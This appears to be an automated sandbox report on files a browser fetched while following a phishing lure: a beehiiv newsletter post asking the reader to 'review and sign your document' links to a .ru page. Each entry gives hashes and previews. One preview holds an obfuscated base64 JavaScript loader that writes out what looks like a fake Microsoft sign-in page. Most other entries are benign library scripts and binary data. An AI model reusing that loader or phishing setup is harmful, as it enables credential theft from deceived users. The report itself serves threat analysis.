                                                                                                                                            Preview:{"post":{"id":"f81a7c40-e8a8-41d3-9598-303f3006911a","publication_id":"e9a24ece-1662-40a3-bd96-eb16d3703de3","web_title":"Please review and sign your document Below","web_subtitle":"Date 19/012025","web_audiences":"free","status":"published","override_scheduled_at":"2025-01-15T15:59:45.699Z","slug":"please-review-and-sign-your-document-below","image_url":"https://beehiiv-images-production.s3.amazonaws.com/uploads/asset/file/3345587b-078a-401e-94e2-28a9336a7b84/aimagesa.jpeg?t=1736956748","meta_default_title":"Please review and sign your document Below","meta_default_description":"Date 19/012025","meta_og_title":"Please review and sign your document Below","meta_og_description":"Date 19/012025","meta_twitter_title":"Please review and sign your document Below","meta_twitter_description":"Date 19/012025","audience":"free","comments_enabled":false,"comments_state":"default","enforce_gated_content":false,"enable_popup_on_scroll":false,"email_capture_title":"Subscribe to keep reading","email
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):95
                                                                                                                                            Entropy (8bit):4.744348471461874
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YtXKE+dISPcdXTTvrCWQXkHmdY:YonZWQXkGa
                                                                                                                                            MD5:D8684D32348FC7310CAF99ED29211DFE
                                                                                                                                            SHA1:8DDA4020FB8B9224017395AD97ED1566FF0F191E
                                                                                                                                            SHA-256:4747E09B2D694916481F5568FA55D7C94098F3B82129F8E52D1A94FA1A878F85
                                                                                                                                            SHA-512:5FBDD6FE340D11F706CC24A13B307772EFF24EDBE35F4EEBEDBB742EFA8527586330C26022176AC841BB7C62711BAAA526DFC20EF3D7335D0FEA5DD55BDF7554
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/post_insights?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Fpost_insights
                                                                                                                                            Preview:{"0":{"id":"f81a7c40-e8a8-41d3-9598-303f3006911a","likes":[],"comment_count":0},"fetched":true}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (7753), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20394
                                                                                                                                            Entropy (8bit):5.879497764600663
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:snu6ANcknwDCuhDVTw0p6lBcknLhhDnu6ANcknwDCuhDVTw0ulrBlrg:PJUM0p+BcknLhhYJUM0ulrBlrg
                                                                                                                                            MD5:68E46342DB4F4947743190FC016BB549
                                                                                                                                            SHA1:123CA358B99530AA938E4806BE01BAC8581D940A
                                                                                                                                            SHA-256:CB0CED2630AD8FAE89373303F01186B781FDF89E1C2BBF2B12D455106FA678E1
                                                                                                                                            SHA-512:C2E9F77CA631531B576664E94671E3A73656F8AF37BFE349E64F85D110D512817319E25066BC8F7A43E7E8B7DE794209B4FC6C21DEEBDDCABF357D14C83D2590
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://2u9o.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-below
                                                                                                                                            Preview: Success is where preparation and opportunity meet. -->....<script>../* I find that the harder I work, the more luck I seem to have. */..if(atob("aHR0cHM6Ly8yVTlPLnB0aXNlcG1hLnJ1L3UydjJqLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0K
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1555
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):606
                                                                                                                                            Entropy (8bit):7.684173827328528
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XQEwKaaoH0VCgMgPPnVhXNC6hecjL2se+Q7gxoAuJPxZyhlR0wz1Pk:XQEw+hZhPPrX46ocfERgKncf08k
                                                                                                                                            MD5:E9D4DB013D5154BF5DEA07A86EFDC826
                                                                                                                                            SHA1:3EC26EF21230B139585C8A4DEE0EDACF21E645D9
                                                                                                                                            SHA-256:1647D03E091826087EA981A97D69434D47CFE518EA4D41B09C198954F25E5D0C
                                                                                                                                            SHA-512:4B0D3FF26B2F6433DFA1CD2E285073BC54C4040A4CEFF0C6AF3F32EA90729AF22C0EBF53277D7201C5D793D65AD64F2AD19A1BF3F31A0ED3695380128A5D76A5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..........}TMo.A..+..u..x.+@JO\z..UB..i......3^.......[.g.,..........w...s.8..pv...u...U..y.<.V..}..._wc.|.o..?W..Lg#........p<n..r.-?.q.=...Y.!ANQ54....b..Ae0...\... .....Q.0.......2..~U.5.h..1o....<.G...C...jhZ.r..i.a*....19..$...[.!..+.2IW.....v.l....Y'.m'}%..I..{.\.0.d.D...X......cI].....7.k._..{|..\$...&..G..q.H...../.q......j....q..z.&.....X..sNp.N"1..h.`;j....q............C.....^...........j(. ..x.V....D.'.I...j@..(V.V.....!........!E.<..X-....R....U<.l.Qn.2..K.VP2UEtl#.,8..H..3..sp...(0.7....K...j..6.......M....p.E..d..((../..@.....&G...^.........z..............
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49954
                                                                                                                                            Entropy (8bit):7.99493321471063
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                                                                            MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                                                                            SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                                                                            SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                                                                            SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (25434), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):25898
                                                                                                                                            Entropy (8bit):5.7301440210070655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:H9JWvQcIEsQdsQvZxySnb0/2PF3D/CyQDVtgFTLLMz2M/zvyMEZMp5:dWH9ySnA/2tCVxm9u/2dc
                                                                                                                                            MD5:B0EDA91E8CB0539D85700C4AEC4F4142
                                                                                                                                            SHA1:365EBF550D336CE26C357E0ADC337AD8C4FC8EC6
                                                                                                                                            SHA-256:5DC27FA64F38EACCF069240EBE849611CA2A37056EA7141CCB85FB7B1FB44DB1
                                                                                                                                            SHA-512:B69158F6D1545B9B6C01FFE0F4E3E978E151AA635198872C926AD1F10B04553EC7AA9C1B0B64E1498EE490C604F1D586C0BFDC666D2FB902F454E065AA8194D8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fpt.live.com/?session_id=d811912f5bba4f73bc2c1cacef83fd6e&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SU
                                                                                                                                            Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>.. <script>var localTarget='https://fpt.live.com/',target='https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&',txnId='d811912f5bba4f73bc2c1cacef83fd6e',ticks='8DD3590B586C7D6',rid='4f2d6f39-9285-f80c-0305-98081a8143af',authKey='taBcrIH61PuCVH7eNCyH0FFaWZWIHTJWSYlBtG47cVtwnBoDi1yEQgyMjR4%252bSpZKCpdn1qpYY4Xeyx2UeY2NVGmyrHbx%252fgU0SU%252fi5B%252biFRKWlrIDZFXZ5Wn3w9Eh4mOjXopdOkewg8kFy%252bXHvw5RR0V%252f4BR2YpQORbjNqU567PDq7j77MNkpZyqZV4soFr8EmIde66GR7MAd40GdvKNSuMg9Th0jLh8lqWkkQqelBhr987exo2Y%252bg2jfuAmWkoESqj7zV9VfL94kvxnKvejpqlSKXpHEfTnFrhR1jYec1iiEUi4aweFAwrh5BQMHsUe%252f',cid='33e01921-4d64-4f8c-a055-5bdaffd5e33d',assessment='',waitresponse=true,bbwait=false,commonquery='&PageId=SU',lsInfo=true,splitFonts=false,noFonts=false,UCH=true,PTO=100,rticks=1736964979355,cmenl=false,ipv6Url='',txnKey='session_id',ridKey='id',lskey='MUID';var timingMetrics={},clientStart=Date.now(),mdtStart,rt,m
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (475)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):837
                                                                                                                                            Entropy (8bit):5.474208532581497
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS/8DP6N2f6nXkVn71oi7IyhntUlJ8DPb:JWkEr8GNAsXkVn71fn0J83
                                                                                                                                            MD5:926808DCBF590AD20EDE773BC751D8DE
                                                                                                                                            SHA1:DE4A0A6DE37A4F7C5AA940FC69D9DC87D8EDAF0F
                                                                                                                                            SHA-256:D4569D221FAAF63454B5A7B4CF1168D3B8F19EE4FE905B98229AF2DC013F883B
                                                                                                                                            SHA-512:7947169D23AB9160B9CD25C04E989CCEBA8CE8392BCAC70910DF603FBC6C9FC685FAC3D04BB1C9607460F30E8E32E8E0113E8C70595DDE12E55E1257E9F9D316
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-Y2tO3Ykg.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="07c517d1-9bfe-5f21-8839-226ab263a389")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function a({title:r,titleId:t,...o},n){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M6 18 18 6M6 6l12 12"}))}const i=e.forwardRef(a);export{i as F};.//# sourceMappingURL=XMarkIcon-Y2tO3Ykg.js.map..//# debugId=07c517d1-9bfe-5f21-8839-226ab263a389.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1244)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1602
                                                                                                                                            Entropy (8bit):5.442821573717911
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE52NxupNMRZEez+AT2ru5PGaLBnKwn:Q/pNazQup
                                                                                                                                            MD5:2F18DA5E58951D39DB053DC02B9CE7FF
                                                                                                                                            SHA1:15CE03FEA87D45FAEA923E06DD7CF7D63779F8A9
                                                                                                                                            SHA-256:5E8AED4279489EF6B38E810B265A0A6AB43A40D53D3C5CF79F68D2F1869C6C0A
                                                                                                                                            SHA-512:706EF39955F1AA7B68B036C74AF8B5AB4B388AA0888FF806F76E4E00FE169AEAAFE89C57BA0E0D5A13C6ABC0A3A2C2CC15E53D84FB6F7FC51C98408416D878A4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6944ee-5681-59fb-88aa-3694eb91cf0b")}catch(e){}}();.import{j as r}from"./jsx-runtime-BjG_zV1W.js";import{r as N}from"./index-D6da9p6-.js";import{T as a}from"./index-CJHGmWl4.js";const k=N.forwardRef((n,C)=>{const{name:o,defaultValue:d,placeholder:c,label:l,labelColor:i,fontColor:m,helperColor:u,disabled:p,onFocus:x,onBlur:g,onChange:h,onKeyDown:b,helperText:s,errorText:t,type:y="text",required:f=!0,value:w,...j}=n;return r.jsxs("div",{className:"space-y-1",children:[l&&r.jsx("label",{htmlFor:o,className:"block text-sm font-medium text-wt-text-on-background",style:{color:i||"#374151"},children:l}),r.jsxs("div",{className:"mt-1",children:[r.jsx("input",{type:y,name:o,id:o,value:w,required:f,defaultValue:d,placeholder:c,disabled:p,onFocus:e=>x?.(e),onBlur:e=>g?.(e),onChange:e=>h?.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):20410
                                                                                                                                            Entropy (8bit):7.980582012022051
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2672
                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):561
                                                                                                                                            Entropy (8bit):5.531083451151844
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSRWr2WNwugd1uedYrbjwaHqDuU6PlK+PsKr2H:UgqHHVvCaRuS2zN5Aue4jwaKDuUglK+k
                                                                                                                                            MD5:8F77952271293BF38C99CE6ED52B7B5D
                                                                                                                                            SHA1:5E5EEF9A687C0F2AB92C4B1609B944454D77D8C1
                                                                                                                                            SHA-256:18775F20106F9E07451947242885899D1FAAA542B259691BAFC70F5BBFB666F9
                                                                                                                                            SHA-512:2B1573F2A8827AF8ECF89304C9BF0E3A35F04C1FB4FC4B452924C980CEF3AD6AFE9E5EA4797A4DABE1EFD5761E8B14F934BAF7E88190DCCAF9EE5918080B972A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useIsLoggedIn-BbU3-q43.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="10d9c228-3990-5929-89c1-3f82c1c46723")}catch(e){}}();.import{b as r}from"./components-Oj2xMfGE.js";const t=()=>{const o=r()[0];if(!o)throw new Error("This hook should only be called in child routes to root");return o.data.isLoggedIn};export{t as u};.//# sourceMappingURL=useIsLoggedIn-BbU3-q43.js.map..//# debugId=10d9c228-3990-5929-89c1-3f82c1c46723.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (14364), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):14364
                                                                                                                                            Entropy (8bit):5.551736975336459
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:NrMeTnVl29bmcbprfpo8yAMIU7OUMrUUfqWqWPM1O7mnkQ451d3hjCpkofFCYfLT:B7nKbHpo8yA56fMrUUVKgxzjCLfvn6m9
                                                                                                                                            MD5:1D49F4C3C45B56E3AF18C2090034C540
                                                                                                                                            SHA1:2E681B26E1666F538FFAD4346AF63D23F878ED32
                                                                                                                                            SHA-256:8D276B7B4595C15A09CD930AE582422FD0C8B2D03121CCE0035657E7DDEDF466
                                                                                                                                            SHA-512:79578AC1A03B2565B37B5382471A255A48C50619AAE3138E5391EF54FB4E1272752EB968E1B251E0C9E421A4F95EAD66FFA6815EEF705600DE209FE10BE603F4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://lf16-tiktok-web.tiktokcdn-us.com/obj/tiktok-web-tx/tiktok/falcon/embed/embed_lib_v1.0.12.js
                                                                                                                                            Preview:!function(){var t={9638:function(t){"use strict";t.exports="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDUiIGhlaWdodD0iNTIiIHZpZXdCb3g9IjAgMCA0NSA1MiIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHBhdGggZD0iTTMzLjA4NiAwSDI0LjIwNzRWMzUuNDIwM0MyNC4yMDc0IDM5LjY0MDYgMjAuNzkyNiA0My4xMDcyIDE2LjU0MyA0My4xMDcyQzEyLjI5MzQgNDMuMTA3MiA4Ljg3ODU4IDM5LjY0MDYgOC44Nzg1OCAzNS40MjAzQzguODc4NTggMzEuMjc1NCAxMi4yMTc1IDI3Ljg4NDEgMTYuMzE1MyAyNy43MzMzVjE4Ljg0MDZDNy4yODQ5OSAxOC45OTEzIDAgMjYuMzAxNCAwIDM1LjQyMDNDMCA0NC42MTQ1IDcuNDM2NzYgNTIgMTYuNjE4OSA1MkMyNS44MDEgNTIgMzMuMjM3OCA0NC41MzkxIDMzLjIzNzggMzUuNDIwM1YxNy4yNThDMzYuNTc2NyAxOS42Njk2IDQwLjY3NDUgMjEuMTAxNCA0NSAyMS4xNzY4VjEyLjI4NDFDMzguMzIyMSAxMi4wNTggMzMuMDg2IDYuNjMxODggMzMuMDg2IDBaIiBmaWxsPSIjMTYxODIzIi8+Cjwvc3ZnPgo="},4635:function(t,e,n){"use strict";n.r(e),n.d(e,{EMBED_TYPE:function(){return p},LIB_CDN_PREFIX:function(){return r},LIB_CSS_ID:function(){return i},LIB_SCRIPT_ID:function(){return o},LIB_VERSION_DEFAULT:function(){return u}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48838)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):49198
                                                                                                                                            Entropy (8bit):5.291087715982654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:EPG6uVzd0vve4Fz2eQ8cve+vnRpYmNRUFnXeM1CIm+gk+k+tYAIRL76frULm8elb:EPHWCB0c/GPd0OmiQb+mVO/nZ6K
                                                                                                                                            MD5:DE51BD49E20DF0C40E699BCA79E60062
                                                                                                                                            SHA1:C2C85F4B2AB1A55192A131A74EB23B26F70CAFDC
                                                                                                                                            SHA-256:DC584F6368161181C03FF6873E9DF30D0612A35F678EDFB7D3DAFB7D03D84FEF
                                                                                                                                            SHA-512:8D46C52AA89621AD67064A16ED42620F245B94A5AAE7C5E20B8292B3DBE8F0DC54CE33470C489DCAEF9F4ACFC041F3FB2A40044612B279FF2BDCDAA32285871A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/i18next-BV1g0mjb.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1bb1b603-909c-56b5-b33f-cfc8351eacac")}catch(e){}}();.const ue={type:"logger",log(i){this.output("log",i)},warn(i){this.output("warn",i)},error(i){this.output("error",i)},output(i,e){console&&console[i]&&console[i].apply(console,e)}};class U{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||ue,this.options=t,this.debug=t.debug}log(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"log","",!0)}warn(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"warn","",!0)}error(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=ar
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8364
                                                                                                                                            Entropy (8bit):4.83779014004918
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/qxvaPILdWdsapQmhQRqer+i8kbNYnuNzdxrDZqCm0R7z6aOA5RHsJ:uWwq7iFqnofsCOA5aJ
                                                                                                                                            MD5:C0E127164E594201E27BF23C83596835
                                                                                                                                            SHA1:FBEC7802FBCE8EDE85E46DF18CAE66EEBACB15E9
                                                                                                                                            SHA-256:E0BCF542E0C68EFDC4D06C566A2E1653212BE6D03D39050823F5E0884D225C52
                                                                                                                                            SHA-512:01D41A12A6FE5119CA8CD1463A2397C2FE5FA3DDB468C6B48694CCE78766807972FFC8B1D108C9CA1646C7FBF7788F91AA7DEE111E05144575B43D7B3BFEDF8A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:(function() {. let log = () => {. };. const APIARY_ENDPOINT = "https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel";. const ADNETWORK_ENDPOINT = "https://adnetwork.beehiiv.com";. let isSecure = true;. if (APIARY_ENDPOINT.includes("dev")) {. log = console.log;. isSecure = false;. }. try {. log("pixel-js");. let [ad_network_placement_id, subscriber_id, event, bhp] = get_bhcl_id();. if (ad_network_placement_id && !(subscriber_id || bhp)) {. getSubscriberId(. ad_network_placement_id,. ({ ad_network_placement_id: ad_network_placement_id2, subscriber_id: subscriber_id2, bhp: bhp2 }) => {. log("got subscriber_id", { subscriber_id: subscriber_id2, bhp: bhp2 });. sendInitialEvent(event, ad_network_placement_id2, subscriber_id2, bhp2);. }. );. } else {. sendInitialEvent(event, ad_network_placement_id, subscriber_id, bhp);. }. } catch (error) {. console.error(error);. }. function sendInitialEvent(even
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (49248)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):82295
                                                                                                                                            Entropy (8bit):5.5815465888366225
                                                                                                                                            Encrypted:false
